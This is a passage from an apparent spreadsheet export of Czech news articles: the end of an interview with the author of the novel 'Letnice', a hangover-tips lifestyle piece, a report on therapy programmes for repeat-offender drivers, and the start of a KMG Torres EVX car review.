pro toho, kdo ho nechápe, vyznívá krutě, protože jim ukazuje jejich tvář jinak, než jak by ji chtěli vidět. Nebo polemizuje s názorem, který oni sami považují za jediný správný. Vzbuzuje v nich pocit nejistoty, proti které musí bojovat. Na druhé straně to znamená, že někde v sobě tu nejistotu mají. Ten, kdo si je sám sebou jistý, dokáže žertovat i na svůj vlastní účet – na rozdíl od toho, kdo pod nohama nemá dostatečně pevnou půdu. Přečtěte si recenze vítězných knih ankety Knihy roku Deníku N: Letnice: Úchvatné dobrodružství Letnic vám vrátí víru v (nejen literární) zázraky Errol; Josefa Škvoreckého život první, 1924–1969: Nová kniha líčí československá léta autora „skandálních“ Zbabělců Šikmý kostel 3: Lednická uzavírá veleúspěšnou trilogii Šikmý kostel. Do životů postav drsně vpadnou komunisté Toužimský &amp;amp; Moravec : příběh nakladatelství: Štorchu, napište nám něco o mamutech! Přečtěte si všechny naše texty ke Knihám roku Deníku N. Finalisté letošní ankety Knihy roku Deníku N. Za poskytnutí prostor pro fotografování děkujeme knihkupectví Academia . Foto: Jakub Plíhal, Deník N Mám pocit, že jediná postava, ke které jste v knize nebyl laskavý, byl ambiciózní byrokrat z velkého města. Proč jste se rozhodl udělat to právě jemu? Protože je to ten, kdo věci láme přes koleno, kdo ve věcech a dějích nevidí jejich srdce, kdo v nich nevidí lidský rozměr a míru. To je to, co lidem obvykle velmi škodí. Uznávám, že je to poněkud prvoplánově vyhraněné, ale nejde o psychologický román. Dá se v současnosti být jen pozorovatelem neshod, které se dějí ve společnosti? Bylo to někdy vůbec možné? Ne. Ať už chcete, nebo ne, musíte alespoň sám pro sebe zaujmout nějaké stanovisko. Ale mnohdy jsou to „neshody“, které ve skutečnosti neexistují, jen si lidé mezi sebou postavili barikádu. Nikdo z nás není jen pozorovatel. Tím, že žijeme, vždy jednáme, nedokážeme se „jen beznázorově dívat“. Jak to máte vy osobně například při něčem, co zjednodušeně nazýváme kulturními válkami? Myslím otázky jako nestejné pohledy na queer lidi nebo na zahraničněpolitickou orientaci. Jste na nějaké straně barikády, nebo to jen pozorujete? To je několik otázek v jedné. Co se týče queer problemtiky, myslím si, že nejde o „válku“, jen někteří věci lámou přes koleno a nahrazují dialog a hledání mezí revolucí. A jiní zase odmítají dialog, protože popírají fakta. Bohužel, jako mnoho věcí v současnosti, i tato otázka se zbytečně radikalizuje a probíhá v konfrontačním tónu. Úplně zbytečně. Nejsem radikál, nemám k tomu sklony. K těmto otázkám přistupuji vždy racionálně a myslím si, že i s úctou a pokorou. Nejsem kompetentní vyjadřovat se k pocitům různých komunit, menšin nebo individualit, nikdy jsem nebyl v jejich kůži. Ale co se týče práv, už za francouzské buržoazní revoluce si tvůrci novodobého uspořádání světa odsouhlasili – a já s nimi souhlasím –, že by je měli mít všichni stejná. A to i v otázce právně uznatelného svazku nebo možnosti dědit majetek a osvojovat si děti. To světu přece nijak neublíží. Západ a Východ je úplně jiná otázka, tam trochu vyhraněný jsem, protože se cítím součástí evropské civilizace. Myslím tím civilizaci takzvaného západního světa, ke které jsme vždy patřili. To je civilizace, která vymyslela novověk, osvícenství, sekulární stát, oddělení soudní a politické moci, úctu k individualitě, svět práva včetně toho mezinárodního a která vnesla do vědy, vztahů a práva racionalitu a logiku. Bylo to po mnoha tápáních, krutostech, omylech a nedorozuměních. Ale došla k uspořádání, které ctí každého jednotlivce, k uspořádání připouštějícímu existenci rozdílnosti názorů, v níž rozhodujícím arbitrem je rozum a poznání oproti vášním, pocitům, mystice a emocím. Tato civilizace se začala vyčleňovat z okolního světa ve starověkém Řecku a starověkém judaismu, korigovala se v antickém Římě a v křesťanské kultuře a přes renesanci, osvícenství a buržoazní revoluci došla až k dnešku. Zaslouží si, abychom ji hájili a chránili, neboť její postoj ke světu není taková samozřejmost, jak se zdá. Je váš styl, kdy se v románu jasně nevyhraňujete, možná i voláním po tom, že to v současnosti chybí? Sociální sítě nás uzavřely do bublin, kde má každý člověk jasný názor. Lidé, kteří navzájem nesouhlasí, si spolu nedokážou povídat. Ano, myslím, že trochu ano. Proto jsou Letnice napsány tak, jak jsou. Snažil jsem se o knihu, která čtenáři udělá radost a která bude laskavá ke každému, kdo s ní bude chtít kráčet. Možná proto se v ní „nevyhraňuji“. Nejsem sociolog, psycholog ani odborník na média, ale myslím si, že v otázce „bublin“ a sociálních sítí máte pravdu. V nich se uzavřená skupina lidí s podobnými názory v podstatě ještě více uzavírá a utvrzuje ve své pravdě. Skeptický pohled nebo dialog s někým, kdo má jiný názor, je z diskuze vyloučen. Otázka je, jestli to v takovém případě ještě je diskuze. Bylo to v minulosti lepší? Nebo je to jen vzpomínkový optimismus? V minulosti to bylo jiné proto, že názor jednotlivce neměl takový dopad. A také proto, že neexistovala internetová „anonymita“, ve které člověk nemusí nést zodpovědnost za svůj názor tváří v tvář jinému. Hlupáci si své řekli u piva v hospodě a tím to skončilo. Dnes lze přes síť ovlivnit stovky a tisíce jiných, aniž vám hrozí konfrontace. Když dojdou argumenty, jednoduše se klikne jinam, ale zasetý stín nedorozumění nebo lži zůstane. Na trend vyhraňování se naskočili i politici. Co s tím? Ano, to je velmi zásadní problém. Politický marketing naběhl na tuto pohodlnou vlnu získávání voličů a na jejich vymezování se vůči politickým konkurentům. Nehledá styčné body, netouží po shodě, naopak upozorňuje na hrany a dělá z nich nepřekonatelné příkopy. Ti druzí nejsou nazýváni „jinými“, ale přímo špatnými, nebo dokonce nepřáteli. Jako by politikům nešlo o hledání správného směru pro tentýž stát, pro tutéž ekonomiku a téhož občana. A to vše s cílem získat na svou stranu většinu, ne kvůli dosažení většího dobra, pokroku, stability a svobody. Politici tady nejsou od toho, aby naplňovali vůli většiny, ale aby hledali cestu k tomu, co je pro většinu dobré. To s vůlí většiny nemusí být vždy shodné. Je na politicích, aby to občanům vysvětlovali. A to i za cenu, že je příště nikdo nezvolí. Být znovu zvolen není politický cíl. V Letnicích naznačujete, že některé věci se musí stát, jsou nevyhnutelné. Je nevyhnutelné to, co se děje teď? Myslím, že to tam vyjadřuji trochu jinak. Protože některé věci se sice stát musí, ale mnohé z nich, cestu k nim i jejich následky, člověk může ovlivnit. Vzpomínáte si na anděla, který Tomášovi ukazuje různé možnosti toho, jaký může být zítřek vycházející ze stejného dneška? A jiný anděl říká Metodějovi: „Co je pro člověka dobré, to musí člověk poznat sám, starejte se o své příběhy a ten Boží nechte jemu.“ To jsou apely na naši zodpovědnost za přítomnost a budoucnost. To, co se děje nyní, je důsledkem našich postojů a rozhodnutí. To my tomu dáváme smysl, přijímáme to nebo odmítáme. V románu jste použil starší verzi otčenáše. Tvrdíte, že je v něm větší důraz na to, aby nám Bůh ukázal, co je dobré, ne aby něco dělal za nás. Vnímáte tedy, že bychom měli mít větší zodpovědnost za budoucnost? Poopravím vás, to není starší verze otčenáše, ale jiná interpretace, možná jiný překlad. Samozřejmě, budoucnost nezáleží jen na nás, ale bez nás nebude. Myslím že u Augustina Aureliána je napsáno „qui fecit te sine te, non salvabit te sine te“ – „ten, kdo tě stvořil bez tebe, nespasí tě bez tebe“. Zdá se, že to je přesně o tom. My jsme zodpovědní za budoucnost, o kterou budeme usilovat. „Non sine te“, tedy „ne bez tebe“. Jsou danosti, které nemůžeme změnit, ale je na nás, co z nich vytvoříme a jak v nich budeme žít a jednat. Je to tak prosté, tak jednoduché a tak samozřejmé. Svět bude takový, jak ho budeme žít. Ne někdy v budoucnosti, ale už dnes. To je naše nebe, ne někde v oblacích, v jiném světě, v jiném čase, ale dnes, tady a v nás. Foto: Marta Nováková Neobáváte se nástupu umělé inteligence, například že by dokázala napsat román na vysoké úrovni? Neobávám. Na literatuře je podstatné nejen to, co píše a jak to píše – to asi lze strojově napodobit –, ale i osobnost toho, kdo to píše. Je v ní zkušenost toho, co prožil, jak myslí, jaké má postoje. Je tam otisk individuality a jedinečnosti autora. Je tam poetičnost jako odraz jeho duše, jeho vnitřního světa, je tam vědomí čtenáře o tom, že někdo prožívá totéž co on, je tam prvek náhody, která je ve vztahu k celku smysluplná a nevypočitatelná, nevyzpytatelná, vzpírající se algoritmům a právě proto zajímavá… A to vše bude ještě velmi dlouho umělé inteligenci nedostupné, právě proto, že je z podstaty umělá . Umělá inteligence také nebude mít radost z tvoření, kterou by mohla vtisknout do díla. Umělá inteligence bude schopna vygenerovat mnoho průměrných děl, ale nevytvoří dílo geniální, které by se vymykalo tomu, co dosud bylo vytvořeno. Vytvoří něco jako Dalí, Márquéz nebo Beethoven, ale nebude novým Márquézem nebo Beethovenem. Prověřovat varianty možného V románu jste nejednoznačný v otázce, zda je pokrok dobrý, nebo ne. Zastáváte tezi, že na všechno nemusíme mít odpověď ani ohledně takové věci, jako je samotná podstata našeho bytí? Víme, jak funguje tělo, víme, jak vypadal velký třesk, jak funguje evoluce. Myslíte si ale, že někdy zjistíme, proč se to stalo nebo kdo to způsobil? Nebo se budeme muset spokojit s tím, že to byl svým způsobem zázrak? Ale my přece dávno víme, proč se to stalo! Stalo se to proto, že to bylo možné. Tak jako se staly tisíce jiných věcí a jevů, z nichž některé přetrvaly déle, některé krátce a některé se ztratily. Principem vesmíru je prověřovat varianty možného; my jsme jedna z variant. Nemyslím si, že by nám byla skryta nějaká důležitá podstata našeho bytí, včetně vědomí, že mnohé z nás je produktem náhody, ale náhody, které svojí reflexí bytí můžeme dát smysl. Smysl pro nás. Samozřejmě, vesmíru, kdyby měl vědomí, by to asi bylo jedno, ale v tuto chvíli jsme my jediným známým vědomím vesmíru. Je dobře, že se stále můžeme dozvědět víc. Že je před námi neustále mnoho toho, co může být odhaleno a objeveno. Pokud to bude existovat, bude mít lidský rod motor a lidský život smysl a bude v něm krása a poezie a touha a láska a… a naděje. Tvrdíte, že jsme „vytěsnili z myšlení zásadní atributy života, jako je smrt, nejistota, nejasnost, nepochopitelnost a neuchopitelnost“. Proč? Bojíme se neznámého? Nevím, jestli se bojíme neznámého, asi to také hraje nějakou roli, ale nechceme si připustit, že smrt je přirozená součást našeho života, dokonce součást, která mu dává smysl. Bojíme se přiznat si, že nejistota, nejasnost je samozřejmost, že náhoda je atribut našeho bytí a „neuchopitelnost“ je přirozený důsledek nemožnosti našeho jazyka a myšlení, neboť myslíme ve slovech, která jevový svět pojmenovávají, umožňují nám o něm komunikovat, ale nevysvětlují ani nenahrazují ho beze zbytku. Možná je to i naše neochota přiznat svoji osobní nedokonalost, kombinovaná s nenaplnitelnou touhou po úplném pojmenování nebo pochopení všeho, co nás obklopuje. Je to doménou lidí v současné době? Bylo to někdy jinak? Pokud ano, proč se to změnilo? V minulosti to bylo trochu jinak. Středověk nebo baroko jsou o neustálé přítomnosti smrti a o vědomí konečnosti našeho individuálního bytí. Ještě před sto lety byla smrt v našich životech přítomna neustále a svět byl mnohem méně „jistý“, predikovatelný. S náhodou – dokonce fatální náhodou – jsme museli počítat neustále. Právě proto, že jsme věděli mnohem méně, jsme více věřili ve „vyšší sílu“? Možná ano. A možná jsme jen byli pozornější a pokornější, možná jsme více chápali, že nejsme všemocní. V souvislosti s předchozími otázkami mě ještě napadá, že jsme narazili na jeden z důvodů existence umění. Jako lidé toužící po pochopení a uchopení věcí máme v umění k dispozici nástroj, který se dostane za to, co dokážeme pojmenovat, který je schopen přenést do našich myslí emoci, nepopsatelný pocit, obraz, vztah, situaci… To je lidský vynález, kterým přesahujeme naše fyzická i kognitivní omezení a v jistém slova smyslu i tu smrt a nejistotu. Názor nemusí být poznáním Jste farmaceut. Jak vnímáte lidi, kteří popírají i pro ně zjevně užitečné pokroky vědy, například ve zdravotnictví? Odmítají očkování, rakovinu léčí pozitivním myšlením. Hledají magii tam, kde není třeba, nebo jsou zkrátka jen nevzdělaní? Pojmenoval jste to přesně, nejsou dostatečně vzdělaní. A současně, co je horší, cítí potřebu bez práce – protože vzdělání a myšlení je práce – mít stejně silnou pozici jako ti, kteří věcem rozumějí, neboť věří v sebe a ve svůj názor. Jenže názor nemusí být – a mnohdy ani není – poznáním. Věda dospěla k takové míře poznání, že mnohé jevy jsou už obtížně vysvětlitelné laikům. Velmi často jsou obtížně vysvětlitelné i odborníkům, kteří na danou oblast nejsou specializovaní. Ten, kdo tomu nerozumí, nerad přiznává, že na to nestačí, a tak si najde jednodušší vysvětlení, protože tomu se věří snadněji. To se týká složitých věcí jako biotechnologie, komplikovanější fyzikální jevy, molekulární biologie nebo fyziologie… Vše, co je dnes vynalezené a veřejně dostupné, je mnohokrát testováno, prověřeno, odborně zpochybněno a následně potvrzeno, protože základní metodou vědy je skepse. Ale v takových případech postoj méně vzdělaných lidí dokážu pochopit. Souvisí to i se ztrátou víry v kompetentnost autorit a odborných institucí, s pocitem, že odborníci tvoří jakousi „výjimečnou kastu“, „vyvolený klub“, elity, něco nadřazeného – a ono to tak právem je. Všichni nejsme stejní, všem nám není dáno stejně a těch, kteří vědí víc, bychom si měli vážit, ne je odsuzovat. To oni nás posouvají dál a usnadňují naše životy. Nepochopitelnou otázkou je pro mě šíření pochybností o věcech, které jsou zřejmé, jako je evoluční princip nebo kulatost země – to je téma, které vyvstalo už ve starověku, vždyť Eratosthenés vypočítal obvod země již dvě stě let před naším letopočtem. Mohlo to být hitem v 15. a 16. století, ne dnes, kdy se gravitační zákon a sluneční soustava probírají už na základní škole. To už je víc než obyčejná hloupost. V této souvislosti si velmi vážím popularizátorů vědy, kteří často pracně vysvětlují složité věci zjednodušeným způsobem. Mým oblíbencem byl etolog Konrad Lorenz nebo fyzik Carl Sagan , který dokázal poměrně pochopitelně a charismaticky vysvětlit laikům i složitější jevy a principy jako teorii relativity, působení gravitace na čas a prostor nebo čtvrtý rozměr. Jen nevím, jestli by si poradil se současnými „plochozemci“. Foto: Marta Nováková Postavu Julie popisujete jako čistou lásku, podobně i Odysseovu partnerku Marinu. Nepopisujete je jako sexuální objekty, nevyzdvihujete jejich křivky, prsa, hýždě, rty. Je to popis spíše prostřednictvím srdce než sexuálního chtíče. To pro mě bylo v současné instagramové přesexualizované době jako balzám na duši. Proč jste se rozhodl je vylíčit tímto způsobem? Protože je to pro mě přirozené. Já si možná naivně myslím, že většina lidí takto vztah s druhým pohlavím vnímá. Nebo se mýlím? Podle mě se bohužel mýlíte. Stačí si prohlédnout reklamy na autoservisy, nebo si otevřít Instagram – když jsem se jeden čas hodně díval na horská kola, začal mi nabízet vypracované ženské zadky na kolech. Ale v reklamě to je jen hra s kalkulovanými emocemi – přirozená hra. Všichni máme v sobě instinkty a pudy, to není nic špatného, jen někam „zadky“ patří – a někam už ne. Kdybych psal jiný druh literatury, možná bych si jimi také pomáhal. Ale tato kniha používá jistý styl a jistou poetiku a té se samozřejmě podřizují i motivy a volba jazyka. Máte pravdu v tom, že mnozí lidé dnes už nerozeznávají hranice, ve kterých lze některé výrazy používat, a kdy je to už za hranou. Dnes už jsou i řečníci, kteří vulgarismy bezostyšně, dokonce hrdě použijí i na veřejném shromáždění, v parlamentu, v médiích. To je nicméně asi jiná otázka. Každopádně to svědčí o jejich přinejmenším nekultivovanosti, možná i asociálnosti. I když je možné, že tím chtějí i vědomě provokovat, ale to je asi ještě horší, než kdyby byli jen nekulturní. To, jak píšete o ženské kráse, je v ostrém rozporu s tím, jak je žena vnímána v médiích a na sociálních sítích, kde je kladen velký důraz na to, zda má dokonalé proporce. Měl jste záměr poněkud znegovat tento současný pohled, který se někomu může zdát vulgární? Asi to nebyl záměr, protože mě nic jiného ani nenapadlo. Pro můj vztah k ženě je podstatná láska – se vším, co k ní patří. Sexualita v tom hraje jen jednu z rolí, ale velmi důležitou – já ji také v Letnicích mám, vždyť Julie se v textu pomiluje se dvěma postavami, jen je popsána jinak než naturalistickým způsobem. Myslím si, že některé věci – a sexualita mezi ně patří – mají svou sílu v tom, že jsou intimní, poněkud zahalené závojem, osobní; a mám pocit, že tak by se o nich mělo i komunikovat. Když je zbavíme toho kouzla, stane se z nich obyčejný biologický proces. Mám pocit, že způsob, jakým je kniha napsaná, se snaží vyhnout dopaminovému nadšení dnešní doby. Plyne pomalu, bez rychlých zvratů, cliffhangerů (uměle budovaného napětí, pozn. red.) . Čteme ji, protože cesta je cíl, ne protože cíl je cíl. Je tento kontrast záměrný? To asi ano, ale bude to dáno tím, že já takhle svět vnímám. Není to vymezování vůči něčemu, ale přirozený popis světa, jak ho vnímám já. Možná nemoderní, ale lidský a upřímný. Ze slovenského originálu přeložila Natalie Pindorová. Autor: Michal Červený Autor person Michal Červený Rubrika transition_slide Hlavní</t>
  </si>
  <si>
    <t>65250</t>
  </si>
  <si>
    <t>20241201_245_3475004971_0de2b8297c1053299ebc.html</t>
  </si>
  <si>
    <t>0de2b8297c1053299ebc</t>
  </si>
  <si>
    <t>Období vánočních večírků je tady. Kocovině předejdete lékořicí, zaženete ji cvičením</t>
  </si>
  <si>
    <t>Období vánočních večírků je tady. Kocovině předejdete lékořicí, zaženete ji cvičením Ilustrační snímek Zdroj: DPphoto / Profimedia Zavřít Ilustrační snímek Zdroj: DPphoto / Profimedia S blížícími se svátky se blíží také období vánočních večírků. Ať už jsou pracovní, s přáteli či s rodinou, alkohol v jejich průběhu mnohdy teče proudem. A vzhledem k tomu, že jediným způsobem, jak se stoprocentně vyhnout kocovině, je nepít nic alkoholického, čas od času se tip, jak se takzvané opičce vyhnout, hodí. Co tedy dělat, abyste jí předešli, či abyste se jí zbavili? Vzhledem k tomu, že popíjení alkoholu je obvykle čistě dobrovolnou záležitostí, za kterou si lidé musí nést následky, vědci mnoho času vývoji léku na kocovinu nevěnují. Žádný stoprocentně účinný přípravek, ať už k užití před pitím či po divoké noci, tak zatím neexistuje. Riziko kocoviny ale lze minimalizovat a také se jí lze za pomoci toho, co už máte doma, zbavit. Prevence Světlé nápoje Při výrobě alkoholu vznikají i vedlejší látky, mezi něž se řadí například kongenery. Ty dodávají řadě alkoholických nápojů jejich specifickou chuť a vůni, zároveň se ale velkou měrou podílejí na vzniku kocoviny. Najdete je v tmavých tekutinách jako jsou tequila, koňak či rum, ale i v „lehčím“ červeném víně. Hvězda filmu Sám doma se prošla po molu. Šedesátku na krku by jí hádal málokdo Pitím světlých či průzračných drinků se sice kocovině nejspíš zcela nevyhnete, ale nemusela by být tak intenzivní. Proto, pokud už si chcete takzvaně přihnout, sáhněte raději například po vodce, ginu či třeba bílém rumu. Dokonce i bílé víno je pro organismus o něco lepší než to červené. Lékořice Lékař a vědec profesor Merlin Thomas navrhuje lékořici jako prostředek proti dehydrataci způsobené alkoholem . Jistě jste si mohli všimnout, že například po pivu , ale i po jiných alkoholických nápojích, chodíte častěji na záchod. Tato pochutina, kterou ovšem ne každý má rád, by tomu měla zabránit. Mohlo by vás zajímat: Češi vzali polské tržnice útokem. Vánoční stromek nakoupíme i o dva tisíce levněji, chválí si „Chemická látka, která dodává lékořici sladkost, dočasně způsobuje, že ledviny produkují méně moči, což je opak toho, co dělá alkohol . Teoreticky se tak ráno budete cítit méně dehydratovaní,“ vysvětlil Thomas. Voda a elektrolyty Dehydratace sice není považována za přímou příčinu kocoviny, ale může přispět k silnější intenzitě jejích projevů jako jsou žízeň, bolest hlavy, závratě či sucho v ústech. Chcete-li těmto stavům předejít, jednoduše střídejte alkohol a obyčejnou vodu, v podstatě v poměru jedna ku jedné. Ušetříte se tak jedněch z nejnepříjemnějších znaků toho, že jste prohýřili noc. Neudělá si čas a pak dítě zahrnuje dárky? Nechyťte se na to a vydržte, říká psychiatrička Je jasné, že v baru se pravděpodobně k nápojům s elektrolyty či elektrolytům jako takovým nedostanete, ale po příchodu domů si je rozhodně dopřejte. Jsou obsažené například v mléku, ovocných džusech či v kokosové vodě. Dají se ale za poměrně nízké ceny sehnat i v tabletách určených buď přímo k polykání či k rozpuštění ve vodě. Žádné cigarety Během divokého večera si i nekuřáci mnohdy jednu či dvě cigaretky k drinku dají. A kuřáci? Ti jsou pak schopní během popíjení vykouřit i výrazně větší množství cigaret, než kolik si jich běžně dají za normálních okolností. Pro vlastní dobro by se ale měli hlídat. Je totiž prokázáno, že kouření výrazně zvyšuje riziko a následně také intenzitu kocoviny. Pozor na jídlo Nechcete-li odpadnout jako pytel brambor, rozhodně se před večírkem dobře najezte. Je nicméně jasné, že po několika hodinách popíjení a zábavy vás hlad přepadne znovu. Vyhnout byste se ale měli pokrmům, které vám stoprocentně podráždí žaludek. Mezi takové se řadí například cokoliv pikantního. Hledáte smysluplnou vánoční sbírku? Dárkem můžete potěšit osamělé seniory i děti bez domova Budete-li předvídaví, můžete si doma do krabičky připravit něco zdravého, čím se po příchodu z večírku zasytíte. A pokud vás popadne chuť něco mlsat, zkuste místo brambůrků například slunečnicová semínka. „Slunečnicová semínka mají vysoký obsah aminokyseliny cysteinu, která podporuje funkci jater,“ říká nutriční terapeutka Chandni Vadgama. Zahánění Spánek Ne nadarmo se říká, že spánek je nejlepší lék. Na druhý den po večírku si nedělejte žádné plány a dopřejte si dostatek času v posteli a udělejte vše pro to, abyste se vyspali opravdu kvalitně. Například, víte-li, že vás snadno budí okolní hluk, připravte si špunty do uší, nebo pokud vás budí světlo, pořiďte si kvalitní zatemnění či masku na oči. Čtěte také: Vánoční trhy v Praze ozdobí smrk z Krompachu . Rozloučit se přišly desítky rodáků i chalupářů Jakmile se ale probudíte a vstanete, snažte se přes den vyhnout jakémukoliv dalšímu pospávání. Nechcete-li, aby vás jedna noc stála několik dní srovnávání do běžného režimu, dodržujte pravidlo zvané „1,2,3“, tedy jeden šlofík, před druhou hodinou odpolední a maximálně 30 minut. Udržet si bdělost můžete třeba procházkou nebo otevřením okna. Tejpy Jistě už jste slyšeli o tejpování a jeho přínosech, jakými je například zlepšení krevního oběhu a lepší činnost svalů. Máte-li tejpy doma, vyzkoušejte je i na kocovinu. „Vodorovné přiložení proužku této pásky na čelo mezi obočí aktivuje akupunkturní body a pomáhá zmírnit bolesti hlavy při kocovině,“ radí fitness trenérka Claudia Kwayosa. Pozor na pití Slyšeli jste o takzvaném vyprošťováku, tedy alkoholickém pití, které si dáte ráno, abyste se dostali z kocoviny? Na to zapomeňte, jde totiž o mýtus. Experti se shodují na tom, že ranní drink jen oddaluje nevyhnutelné. Ze slaboučké kocoviny se požitím dalšího alkoholu naopak může stát ještě horší, než s jakou se vaše tělo původně mělo vypořádávat. Jak ušetřit při pečení cukroví a neslevit z jeho kvality? Plánujte a nelpěte jen na másle Na žízeň, obzvlášť v případě, že vám obyčejná voda připadá příliš těžká, si můžete zvolit nápoje, které vám od kocoviny pomohou. Jedná se například o perlivou vodu. Kombucha či kefír pak obsahují prospěšné bakterie, které prospějí střevnímu mikrobiomu a uleví vám od nevolnosti. Podobný účinek má zázvorový čaj, nepijte ale žádný bylinkový – ten by mohl zpracovávání alkoholu naopak zpomalit. Cvičení Pokud není vaše kocovina tak silná, že vás v podstatě upoutá k posteli, cvičením si můžete velmi ulevit. Nemusíte se vyloženě mučit v posilovně, stačí lehké až středně náročné cvičení, kterým podpoříte krevní oběh, zrychlíte metabolismus a samozřejmě také prostřednictvím potu rychleji zbavíte tělo toxinů. Navíc ze sebe budete mít lepší pocit. Snídaně Stejně jako je důležité se dobře najíst před večírkem, i ráno s takzvanou opičkou hraje jídlo podstatnou roli. Požívání alkoholu může způsobit nízkou hladinu krevního cukru, protože narušuje vypouštění glukózy z jater do krve. Snídaně bohatá na živiny tak může vyrovnat krevní hodnoty a dopomoct k tomu, abyste se necítili slabě a aby vás nebolela hlava. Kde se vzaly čokoládové figurky: Stojí za nimi objev nizozemského lékárníka Nebudete-li vyloženě ve stavu, kdy v sobě žádné jídlo neudržíte, ideální snídani by mohla tvořit například ovesná kaše se sušeným ovocem, je totiž plná potřebných vitamínů, vlákniny a kvalitních sacharidů. Je dobře, když děti nedostanou vše, co si přejí, říká dětská psychiatrička: Odesláním formuláře souhlasíte s podmínkami zpracování osobních údajů Sdílejte článek Autor: Eliška Reiglová Autor person Eliška Reiglová</t>
  </si>
  <si>
    <t>20241201_246_3475020968_58bf66882935b7c35ba4.html</t>
  </si>
  <si>
    <t>58bf66882935b7c35ba4</t>
  </si>
  <si>
    <t>Terapeutickými programy pro řidiče prošlo 370 lidí, na hodnocení je podle ministerstva dopravy ještě brzy</t>
  </si>
  <si>
    <t>Terapeutickými programy pro řidiče prošlo 370 lidí, na hodnocení je podle ministerstva dopravy ještě brzy 01. 12. 2024 Tereza Čapková Sdílet Do terapeutických programů pro řidiče „recidivisty“ se mělo podle odhadů Centra dopravního výzkumu hlásit ročně 15 až 20 tisíc řidičů. Dosud jimi úspěšně prošlo 370 lidí. Od letošního dubna do září se do nich podle mluvčí ministerstva dopravy Aleny Mühl přihlásilo 748 lidí. „Co se týká vyhodnocení, jestli a jak se terapeutické programy osvědčily, zatím je ještě brzy dělat závěry,“ sdělila Ekonomickému deníku. Od spuštění programů podle mluvčí uplynula relativně krátká doba a žadatelům, kterým byl od 1. července 2023 udělen zákaz řízení motorových vozidel, tyto zákazy podle ní teprve postupně končí. Vyhodnocení chce udělat resort dopravy po přibližně roce fungování. Programy pro řidiče mohou vést pouze akreditovaní lektoři, těch je podle Aleny Mühl 138. Ředitel Divize dopravních technologií a lidského faktoru Centra dopravního výzkumu Pavel Řezáč Ekonomickému deníku v květnu řekl, že v letošním roce ještě vysoký zájem vzhledem ke startu kurzů v dubnu nepředpokládá. „Klienti typicky nechávají tuto povinnost až na dobu, kdy žádají o řidičské oprávnění zpět, i přesto, že mohou program realizovat kdykoli v průběhu odejmutí řidičského oprávnění. To způsobuje velmi pozvolný náběh,“ sdělil tehdy. Speciální terapeutické programy cílí zejména na řidiče-recidivisty. Kvůli vrácení řidičského průkazu je musí podstoupit například řidiči, kteří odmítli dechovou zkoušku na alkohol nebo psychotropní látky, přišli o řidičský průkaz na dobu nejméně 18 měsíců, anebo jim to nařídil soud. Novou povinnost letos na jaře zavedla novela zákona o pozemních komunikacích. Mohlo by vás zajímat Nové tratě i podmořské metro. Švédsko chce do roku 2037 investovat do dopravních projektů až 2,5 bilionu korun Cena terapeutických programů je daná vyhláškou ministerstva dopravy a je stanovena na 13 310 korun včetně DPH. Terapeutické programy pro řidiče zpracovalo Centrum dopravního výzkumu ve spolupráci s výzkumnými pracovišti. (teč) Autor: Tereza Čapková Autor person Tereza Čapková</t>
  </si>
  <si>
    <t>4120</t>
  </si>
  <si>
    <t>7750</t>
  </si>
  <si>
    <t>20241201_247_3475004961_093ad5d86df925a03907.html</t>
  </si>
  <si>
    <t>093ad5d86df925a03907</t>
  </si>
  <si>
    <t>Denní výběr: Komu hrozí exekuce: v Pelhřimově dluží nejvíc lidí, v malých Bácovicích každý de</t>
  </si>
  <si>
    <t>20241201_248_3475004962_3c2049825f429cec9015.html</t>
  </si>
  <si>
    <t>3c2049825f429cec9015</t>
  </si>
  <si>
    <t>Denní výběr: Pelhřimovští studenti sbírají lízátka. Pomohou tak dětem s nádorovým onemocněním</t>
  </si>
  <si>
    <t>20241201_249_3475004378_2f5438de71fd7a47efd2.html</t>
  </si>
  <si>
    <t>2f5438de71fd7a47efd2</t>
  </si>
  <si>
    <t>Denní výběr: Policie odhalila na Domažlicku tři cizince, kteří nelegálně pobývají v zemi</t>
  </si>
  <si>
    <t>20241201_25_3555214790_593409ce31ca8819a9f3.html</t>
  </si>
  <si>
    <t>593409ce31ca8819a9f3</t>
  </si>
  <si>
    <t>Test KMG Torres EVX 2024: Milion důvodů pro nákup pod 30 tisíc</t>
  </si>
  <si>
    <t>Test KMG Torres EVX 2024: Milion důvodů pro nákup pod 30 tisíc Je KMG Torres EVX 2024 skutečně elektrickým králem pro rodiny? Last updated: 2. prosince 2024 KMG Torres EVX je na trhu s elektrickými vozy žhavý, a to z dobrého důvodu – nabízí tři klíčové přednosti, které je těžké ignorovat: záruku na milion kilometrů na baterii, sedmiletou tovární záruku a cenu, která činí pouhých 29 900 eur se zohledněním dotace. Přidejte k tomu působivých 839 litrů zavazadlového prostoru a vnější vzhled skutečné off-roadové bestie a otázka zní: stojí to za ty peníze? Abychom našli odpověď, vzali jsme jej na testovací jízdu dlouhou více než 1100 kilometrů. Podívejme se, co jsme objevili. Příběh začíná razítkem SsangYong, kterou KMG před časem převzala. SsangYong byl známý odolnými, ale esteticky často kontroverzními vozy, které si přesto našly loajální zákaznickou základnu. Na KMG zvolili však novou strategii: vyrábět odolná auta, které jsou funkční, cenově dostupné a reprezentují korejské hodnoty - kvalitu, užitečnost a férovou cenu. Vize společnosti je jasná: pokud Hyundai a Kia zvítězí v Koreji , je tu rozhodně prostor pro třetí značku, která oživí její staré kořeny. Prvním výsledkem této filozofie je Torres EVX, elektrické SUV, které hodně slibuje – možná ještě víc, než můžeme na první pohled uvěřit. Vydrží tyto sliby na silnici? Čas to zkontrolovat. Video test: Test KMG Torres EVX 2024 Foto: Jan Macarol Vnější design: korejský styl s nádechem známých inspirací Jestli Torresovi nelze nic vytknout, pak je to nedostatek fantazie při reinterpretaci známých designových prvků. KMG se podařilo vytvořit vozidlo, které i přes své jasné vlivy zůstává jedinečné a s vlastním podpisem. Torres EVX se svou délkou 4,7 metru řadí mezi větší elektrická SUV, přímo vedle obou modelů Volkswagen ID.4 a Škoda Enyaqu. Ve srovnání s těmito dvěma ale působí mnohem robustněji a jako „skutečné SUV“, což mu dodává dodatečnou váhu – doslova i symbolicky. Ale jen naoko. Vůz je v zásadě na své rozměry extrémně lehký a váží pouhých 1 915 kilogramů. Vzadu se ukrývá zavazadlový prostor o objemu 839 litrů. Vpředu je cítit nádech novějších modelů Jeepu a zadní svítilny by klidně mohly být připsány předchozí generaci Range Rover. Nicméně Torres EVX zachovává si sebevědomý postoj, protože ani v základní výbavě - jako je ta na obrázcích - nepůsobí lacině. Ráfky mají „jen“ 18 palců, ale právě proto z SUV vyzařuje skutečný off-roadový charakter. Boční silueta dodává nádech dynamiky a dává vozu znatelný vzhled na 